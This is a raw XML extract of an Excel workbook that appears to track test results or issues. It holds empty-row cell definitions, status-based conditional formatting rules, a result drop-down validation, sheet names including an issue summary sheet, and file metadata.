      <c r="B14" s="19"/>
      <c r="C14" s="20"/>
      <c r="D14" s="21"/>
      <c r="E14" s="26"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="33"/>
      <c r="J14" s="20"/>
    </row>
    <row r="15" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A15" s="18"/>
      <c r="B15" s="19"/>
      <c r="C15" s="20"/>
      <c r="D15" s="31"/>
      <c r="E15" s="26"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="20"/>
      <c r="I15" s="20"/>
      <c r="J15" s="20"/>
    </row>
    <row r="16" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A16" s="18"/>
      <c r="B16" s="19"/>
      <c r="C16" s="20"/>
      <c r="D16" s="20"/>
      <c r="E16" s="26"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="20"/>
      <c r="I16" s="20"/>
      <c r="J16" s="20"/>
    </row>
    <row r="17" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A17" s="18"/>
      <c r="B17" s="19"/>
      <c r="C17" s="20"/>
      <c r="D17" s="31"/>
      <c r="E17" s="26"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="20"/>
      <c r="I17" s="20"/>
      <c r="J17" s="20"/>
    </row>
    <row r="18" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A18" s="18"/>
      <c r="B18" s="19"/>
      <c r="C18" s="20"/>
      <c r="D18" s="31"/>
      <c r="E18" s="26"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="20"/>
      <c r="I18" s="20"/>
      <c r="J18" s="20"/>
    </row>
    <row r="19" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A19" s="18"/>
      <c r="B19" s="19"/>
      <c r="C19" s="20"/>
      <c r="D19" s="31"/>
      <c r="E19" s="26"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="20"/>
      <c r="I19" s="20"/>
      <c r="J19" s="20"/>
    </row>
    <row r="20" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A20" s="18"/>
      <c r="B20" s="19"/>
      <c r="C20" s="20"/>
      <c r="D20" s="31"/>
      <c r="E20" s="26"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="20"/>
      <c r="I20" s="20"/>
      <c r="J20" s="20"/>
    </row>
    <row r="21" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A21" s="18"/>
      <c r="B21" s="19"/>
      <c r="C21" s="20"/>
      <c r="D21" s="31"/>
      <c r="E21" s="26"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="20"/>
      <c r="I21" s="20"/>
      <c r="J21" s="20"/>
    </row>
    <row r="22" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A22" s="18"/>
      <c r="B22" s="19"/>
      <c r="C22" s="20"/>
      <c r="D22" s="31"/>
      <c r="E22" s="26"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="20"/>
      <c r="I22" s="20"/>
      <c r="J22" s="20"/>
    </row>
    <row r="23" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A23" s="18"/>
      <c r="B23" s="19"/>
      <c r="C23" s="20"/>
      <c r="D23" s="31"/>
      <c r="E23" s="26"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="20"/>
      <c r="I23" s="20"/>
      <c r="J23" s="20"/>
    </row>
    <row r="27" s="11" customFormat="1" ht="14.15"/>
    <row r="28" s="11" customFormat="1" ht="14.15"/>
    <row r="29" s="11" customFormat="1" ht="14.15"/>
    <row r="30" s="11" customFormat="1" ht="14.15"/>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A9">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A10">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A11">
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</formula1>
    </dataValidation>
  </dataValidation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23"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="M7" sqref="M7"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="9" defaultRowHeight="14.1"/>
  <cols>
    <col min="1" max="1" width="9" style="11"/>
    <col min="2" max="2" width="12.5765765765766" style="11" customWidth="1"/>
    <col min="3" max="3" width="41.1891891891892" style="11" customWidth="1"/>
    <col min="4" max="4" width="86.3873873873874" style="11" customWidth="1"/>
    <col min="5" max="5" width="31.9459459459459" style="11" customWidth="1"/>
    <col min="6" max="6" width="19.7567567567568" style="11" customWidth="1"/>
    <col min="7" max="7" width="17.3243243243243" style="11" customWidth="1"/>
    <col min="8" max="8" width="9" style="11"/>
    <col min="9" max="9" width="14.7477477477477" style="11" customWidth="1"/>
    <col min="10" max="10" width="12.8558558558559" style="11" customWidth="1"/>
    <col min="11" max="16384" width="9" style="11"/>
  </cols>
  <sheetData>
    <row r="1" s="11" customFormat="1" ht="18.4" spans="1:10">
      <c r="A1" s="1" t="s">
        <v>435</v>
      </c>
      <c r="B1" s="1"/>
      <c r="C1" s="1"/>
      <c r="D1" s="1"/>
      <c r="E1" s="1"/>
      <c r="F1" s="1"/>
      <c r="G1" s="1"/>
      <c r="H1" s="1"/>
      <c r="I1" s="1"/>
      <c r="J1" s="1"/>
    </row>
    <row r="3" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A3" s="5" t="s">
        <v>1</v>
      </c>
      <c r="B3" s="5" t="s">
        <v>2</v>
      </c>
      <c r="C3" s="5" t="s">
        <v>3</v>
      </c>
      <c r="D3" s="5" t="s">
        <v>4</v>
      </c>
      <c r="E3" s="5" t="s">
        <v>5</v>
      </c>
      <c r="F3" s="5" t="s">
        <v>6</v>
      </c>
      <c r="G3" s="5" t="s">
        <v>7</v>
      </c>
      <c r="H3" s="5" t="s">
        <v>8</v>
      </c>
      <c r="I3" s="5" t="s">
        <v>9</v>
      </c>
      <c r="J3" s="5" t="s">
        <v>10</v>
      </c>
    </row>
    <row r="4" s="11" customFormat="1" ht="127.3" spans="1:10">
      <c r="A4" s="12" t="s">
        <v>436</v>
      </c>
      <c r="B4" s="13" t="s">
        <v>437</v>
      </c>
      <c r="C4" s="14" t="s">
        <v>438</v>
      </c>
      <c r="D4" s="15" t="s">
        <v>439</v>
      </c>
      <c r="E4" s="16" t="s">
        <v>440</v>
      </c>
      <c r="F4" s="17" t="s">
        <v>441</v>
      </c>
      <c r="G4" s="17" t="s">
        <v>442</v>
      </c>
      <c r="H4" s="17"/>
      <c r="I4" s="32"/>
      <c r="J4" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="5" s="11" customFormat="1" ht="29.15" spans="1:10">
      <c r="A5" s="12" t="s">
        <v>443</v>
      </c>
      <c r="B5" s="13" t="s">
        <v>444</v>
      </c>
      <c r="C5" s="14" t="s">
        <v>445</v>
      </c>
      <c r="D5" s="15" t="s">
        <v>446</v>
      </c>
      <c r="E5" s="16" t="s">
        <v>447</v>
      </c>
      <c r="F5" s="17" t="s">
        <v>310</v>
      </c>
      <c r="G5" s="17" t="s">
        <v>448</v>
      </c>
      <c r="H5" s="17"/>
      <c r="I5" s="32"/>
      <c r="J5" s="14" t="s">
        <v>17</v>
      </c>
    </row>
    <row r="6" s="11" customFormat="1" ht="99" spans="1:10">
      <c r="A6" s="12" t="s">
        <v>449</v>
      </c>
      <c r="B6" s="13" t="s">
        <v>450</v>
      </c>
      <c r="C6" s="35" t="s">
        <v>451</v>
      </c>
      <c r="D6" s="36" t="s">
        <v>452</v>
      </c>
      <c r="E6" s="16" t="s">
        <v>51</v>
      </c>
      <c r="F6" s="17" t="s">
        <v>310</v>
      </c>
      <c r="G6" s="17" t="s">
        <v>453</v>
      </c>
      <c r="H6" s="17"/>
      <c r="I6" s="32"/>
      <c r="J6" s="35"/>
    </row>
    <row r="7" s="11" customFormat="1" ht="352.7" spans="1:10">
      <c r="A7" s="12" t="s">
        <v>454</v>
      </c>
      <c r="B7" s="13" t="s">
        <v>455</v>
      </c>
      <c r="C7" s="35" t="s">
        <v>456</v>
      </c>
      <c r="D7" s="36" t="s">
        <v>457</v>
      </c>
      <c r="E7" s="16" t="s">
        <v>458</v>
      </c>
      <c r="F7" s="17" t="s">
        <v>310</v>
      </c>
      <c r="G7" s="17" t="s">
        <v>459</v>
      </c>
      <c r="H7" s="17"/>
      <c r="I7" s="32"/>
      <c r="J7" s="35"/>
    </row>
    <row r="8" s="11" customFormat="1" ht="14.55" spans="2:10">
      <c r="B8" s="19"/>
      <c r="C8" s="20"/>
      <c r="D8" s="21"/>
      <c r="E8" s="26"/>
      <c r="F8" s="24"/>
      <c r="G8" s="24"/>
      <c r="H8" s="24"/>
      <c r="I8" s="33"/>
      <c r="J8" s="20"/>
    </row>
    <row r="9" s="11" customFormat="1" ht="14.55" spans="2:10">
      <c r="B9" s="19"/>
      <c r="C9" s="20"/>
      <c r="D9" s="21"/>
      <c r="E9" s="29"/>
      <c r="F9" s="24"/>
      <c r="G9" s="24"/>
      <c r="H9" s="24"/>
      <c r="I9" s="33"/>
      <c r="J9" s="20"/>
    </row>
    <row r="10" s="11" customFormat="1" ht="14.55" spans="2:10">
      <c r="B10" s="19"/>
      <c r="C10" s="20"/>
      <c r="D10" s="21"/>
      <c r="E10" s="29"/>
      <c r="F10" s="30"/>
      <c r="G10" s="30"/>
      <c r="H10" s="24"/>
      <c r="I10" s="33"/>
      <c r="J10" s="20"/>
    </row>
    <row r="11" s="11" customFormat="1" ht="14.55" spans="1:10">
      <c r="A11" s="25" t="s">
        <v>67</v>
      </c>
      <c r="B11" s="19"/>
      <c r="C11" s="20"/>
      <c r="D11" s="21"/>
      <c r="E11" s="29"/>
      <c r="F11" s="24"/>
      <c r="G11" s="24"/>
      <c r="H11" s="24"/>
      <c r="I11" s="33"/>
      <c r="J11" s="20"/>
    </row>
    <row r="12" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A12" s="27" t="s">
        <v>68</v>
      </c>
      <c r="B12" s="19"/>
      <c r="C12" s="20"/>
      <c r="D12" s="21"/>
      <c r="E12" s="29"/>
      <c r="F12" s="24"/>
      <c r="G12" s="24"/>
      <c r="H12" s="24"/>
      <c r="I12" s="33"/>
      <c r="J12" s="20"/>
    </row>
    <row r="13" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A13" s="28" t="s">
        <v>69</v>
      </c>
      <c r="B13" s="19"/>
      <c r="C13" s="20"/>
      <c r="D13" s="21"/>
      <c r="E13" s="29"/>
      <c r="F13" s="24"/>
      <c r="G13" s="24"/>
      <c r="H13" s="24"/>
      <c r="I13" s="33"/>
      <c r="J13" s="20"/>
    </row>
    <row r="14" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A14" s="17" t="s">
        <v>70</v>
      </c>
      <c r="B14" s="19"/>
      <c r="C14" s="20"/>
      <c r="D14" s="21"/>
      <c r="E14" s="26"/>
      <c r="F14" s="24"/>
      <c r="G14" s="24"/>
      <c r="H14" s="24"/>
      <c r="I14" s="33"/>
      <c r="J14" s="20"/>
    </row>
    <row r="15" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A15" s="18"/>
      <c r="B15" s="19"/>
      <c r="C15" s="20"/>
      <c r="D15" s="31"/>
      <c r="E15" s="26"/>
      <c r="F15" s="24"/>
      <c r="G15" s="24"/>
      <c r="H15" s="20"/>
      <c r="I15" s="20"/>
      <c r="J15" s="20"/>
    </row>
    <row r="16" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A16" s="18"/>
      <c r="B16" s="19"/>
      <c r="C16" s="20"/>
      <c r="D16" s="20"/>
      <c r="E16" s="26"/>
      <c r="F16" s="24"/>
      <c r="G16" s="24"/>
      <c r="H16" s="20"/>
      <c r="I16" s="20"/>
      <c r="J16" s="20"/>
    </row>
    <row r="17" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A17" s="18"/>
      <c r="B17" s="19"/>
      <c r="C17" s="20"/>
      <c r="D17" s="31"/>
      <c r="E17" s="26"/>
      <c r="F17" s="24"/>
      <c r="G17" s="24"/>
      <c r="H17" s="20"/>
      <c r="I17" s="20"/>
      <c r="J17" s="20"/>
    </row>
    <row r="18" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A18" s="18"/>
      <c r="B18" s="19"/>
      <c r="C18" s="20"/>
      <c r="D18" s="31"/>
      <c r="E18" s="26"/>
      <c r="F18" s="24"/>
      <c r="G18" s="24"/>
      <c r="H18" s="20"/>
      <c r="I18" s="20"/>
      <c r="J18" s="20"/>
    </row>
    <row r="19" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A19" s="18"/>
      <c r="B19" s="19"/>
      <c r="C19" s="20"/>
      <c r="D19" s="31"/>
      <c r="E19" s="26"/>
      <c r="F19" s="23"/>
      <c r="G19" s="23"/>
      <c r="H19" s="20"/>
      <c r="I19" s="20"/>
      <c r="J19" s="20"/>
    </row>
    <row r="20" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A20" s="18"/>
      <c r="B20" s="19"/>
      <c r="C20" s="20"/>
      <c r="D20" s="31"/>
      <c r="E20" s="26"/>
      <c r="F20" s="24"/>
      <c r="G20" s="24"/>
      <c r="H20" s="20"/>
      <c r="I20" s="20"/>
      <c r="J20" s="20"/>
    </row>
    <row r="21" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A21" s="18"/>
      <c r="B21" s="19"/>
      <c r="C21" s="20"/>
      <c r="D21" s="31"/>
      <c r="E21" s="26"/>
      <c r="F21" s="24"/>
      <c r="G21" s="24"/>
      <c r="H21" s="20"/>
      <c r="I21" s="20"/>
      <c r="J21" s="20"/>
    </row>
    <row r="22" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A22" s="18"/>
      <c r="B22" s="19"/>
      <c r="C22" s="20"/>
      <c r="D22" s="31"/>
      <c r="E22" s="26"/>
      <c r="F22" s="24"/>
      <c r="G22" s="24"/>
      <c r="H22" s="20"/>
      <c r="I22" s="20"/>
      <c r="J22" s="20"/>
    </row>
    <row r="23" s="11" customFormat="1" ht="15" spans="1:10">
      <c r="A23" s="18"/>
      <c r="B23" s="19"/>
      <c r="C23" s="20"/>
      <c r="D23" s="31"/>
      <c r="E23" s="26"/>
      <c r="F23" s="24"/>
      <c r="G23" s="24"/>
      <c r="H23" s="20"/>
      <c r="I23" s="20"/>
      <c r="J23" s="20"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A1:J1"/>
    <mergeCell ref="A2:J2"/>
  </mergeCells>
  <conditionalFormatting sqref="I1:J1">
    <cfRule type="containsText" dxfId="0" priority="42" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="41" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I1)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="40" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I1)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H9">
    <cfRule type="cellIs" dxfId="3" priority="21" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="20" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="19" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I9">
    <cfRule type="containsText" dxfId="0" priority="24" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="23" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I9)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="22" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I9)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H10">
    <cfRule type="cellIs" dxfId="3" priority="15" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="14" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="13" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I10">
    <cfRule type="containsText" dxfId="0" priority="18" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="17" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I10)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="16" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I10)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H11">
    <cfRule type="cellIs" dxfId="3" priority="9" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="8" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="7" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I11">
    <cfRule type="containsText" dxfId="0" priority="12" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="11" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I11)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="10" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I11)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A12">
    <cfRule type="cellIs" dxfId="5" priority="37" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="38" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="39" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A13">
    <cfRule type="cellIs" dxfId="5" priority="34" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="35" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="36" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="A14">
    <cfRule type="cellIs" dxfId="5" priority="31" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="32" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="3" priority="33" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H4:H8">
    <cfRule type="cellIs" dxfId="3" priority="27" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="26" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="25" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="H12:H14">
    <cfRule type="cellIs" dxfId="3" priority="3" operator="equal">
      <formula>"issue"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="4" priority="2" operator="equal">
      <formula>"N/A"</formula>
    </cfRule>
    <cfRule type="cellIs" dxfId="5" priority="1" operator="equal">
      <formula>"pass"</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I4:I8">
    <cfRule type="containsText" dxfId="0" priority="30" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="29" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I4)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="28" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I4)))</formula>
    </cfRule>
  </conditionalFormatting>
  <conditionalFormatting sqref="I12:I14">
    <cfRule type="containsText" dxfId="0" priority="6" operator="between" text="Done">
      <formula>NOT(ISERROR(SEARCH("Done",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="1" priority="5" operator="between" text="In progress">
      <formula>NOT(ISERROR(SEARCH("In progress",I12)))</formula>
    </cfRule>
    <cfRule type="containsText" dxfId="2" priority="4" operator="between" text="Not started">
      <formula>NOT(ISERROR(SEARCH("Not started",I12)))</formula>
    </cfRule>
  </conditionalFormatting>
  <dataValidations count="1">
    <dataValidation type="list" allowBlank="1" showInputMessage="1" prompt="result" sqref="H4:H14">
      <formula1>$A$16:$A$23</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13</vt:i4>
      </vt:variant>
    </vt:vector>
  </HeadingPairs>
  <TitlesOfParts>
    <vt:vector size="13" baseType="lpstr">
      <vt:lpstr>1</vt:lpstr>
      <vt:lpstr>2</vt:lpstr>
      <vt:lpstr>3</vt:lpstr>
      <vt:lpstr>4</vt:lpstr>
      <vt:lpstr>5</vt:lpstr>
      <vt:lpstr>6</vt:lpstr>
      <vt:lpstr>7</vt:lpstr>
      <vt:lpstr>8</vt:lpstr>
      <vt:lpstr>9</vt:lpstr>
      <vt:lpstr>10</vt:lpstr>
      <vt:lpstr>11</vt:lpstr>
      <vt:lpstr>12</vt:lpstr>
      <vt:lpstr>问题汇总</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wokr-station</cp:lastModifiedBy>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-05-12T11:15:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-24T17:04:06Z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2052-12.1.0.16729</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>4E4666B7A3E1416284E706C6233CAE5C_12</vt:lpwstr>
  </property>
</Properties>
</file>